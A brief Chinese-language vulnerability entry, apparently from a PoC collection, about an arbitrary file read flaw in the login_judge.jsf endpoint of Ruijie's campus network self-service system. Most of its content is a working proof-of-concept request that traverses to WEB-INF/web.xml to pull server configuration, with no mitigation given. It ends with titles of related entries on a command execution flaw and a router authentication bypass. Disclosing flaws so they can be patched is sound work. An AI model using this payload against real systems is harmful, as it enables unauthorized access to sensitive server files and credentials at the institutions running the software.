锐捷 校园网自助服务系统 login_judge.jsf 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件
登陆页面
验证POC
/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F
锐捷 BCR商业无线云网关 后台命令执行漏洞 磊科 NI360路由器 netcoreloginnetcorelogin 认证绕过漏洞